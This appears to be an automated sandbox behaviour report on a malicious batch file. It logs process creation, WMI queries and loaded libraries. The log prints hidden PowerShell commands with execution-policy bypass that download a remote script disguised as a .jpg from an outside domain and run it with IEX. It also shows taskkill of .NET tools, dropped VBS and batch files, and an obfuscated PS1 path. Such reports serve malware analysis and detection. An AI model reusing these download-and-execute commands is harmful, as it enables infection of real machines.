129,58,194,174,167,92,127,149,158,110,132,152,233,187,136,75,191,35,76,162,108,203,49,189,236,51,97,43,202,198,173,148,129,178,238,255,30,37,81,214,234,194,3,171,152,74,211,61,200,138,255,16,65,77,13,246,16,241,71,164,210,123,26,86,65,253,217,66,236,59,188,49,20,127,132,114,213,147,120,116,255,6,124,108,167,241,194,48,241,49,76,42,59,64,104,253,254,253,197,100,19,54,132,126,251,2,170,158,157,170,151,71,24,182,175,80,63,32,221,176,19,98,251,13,36,196,76,220,74,185,126,30,63,136,137,181,210,174,229,16,19,111,70,84,122,105,15,98,119,35,38,222,137,192,132,245,23,106,254,11,123,159,169,140,76,123,121,142,252,231,141,138,124,173,140,18,147,159,165,0,27,232,191,169,200,109,84,228,250,248,24,57,228,88,194,223,158,163,238,31,84,252,183,25,179,63,205,52,125,132,153,25,51,71,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "CCleanerBrowser.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "aspnet_regbrowsers.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "aspnet_compiler.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AppLaunch.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "InstallUtil.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "jsc.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MSBuild.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "RegAsm.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "cvtres.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "RegSvcs.exe")

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: taskkill.exe, 00000004.00000003.1720359776.00000158F86D8000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000004.00000003.1720258016.00000158F86D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "CCleanerBrowser.exe");.VBS;.VBE;.JS;.JSE;x
Source: taskkill.exe, 00000004.00000002.1720972555.00000158F86D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "CCleanerBrowser.exe");.VBS;.VBE;.JS;.JSE;66

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\27#U0646.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')\|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')\|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM CCleanerBrowser.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM aspnet_regbrowsers.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM aspnet_compiler.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM AppLaunch.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM InstallUtil.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM jsc.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM MSBuild.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM RegAsm.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cvtres.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM RegSvcs.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\HHYKTIPGRYF.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\HTRFAAYAKOCE.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\UZKDPUUZKDPsUZKDPeUZKDPrUZKDPs\PUZKDPuUZKDPbUZKDPlUZKDPiUZKDPc\JGEBGEOPVP.ps1'.replace('UZKDP','')"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')\|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')\|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM CCleanerBrowser.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM aspnet_regbrowsers.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM aspnet_compiler.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM AppLaunch.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM InstallUtil.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM jsc.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM MSBuild.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM RegAsm.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cvtres.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM RegSvcs.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\HHYKTIPGRYF.vbs"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\HTRFAAYAKOCE.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\UZKDPUUZKDPsUZKDPeUZKDPrUZKDPs\PUZKDPuUZKDPbUZKDPlUZKDPiUZKDPc\JGEBGEOPVP.ps1'.replace('UZKDP','')"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
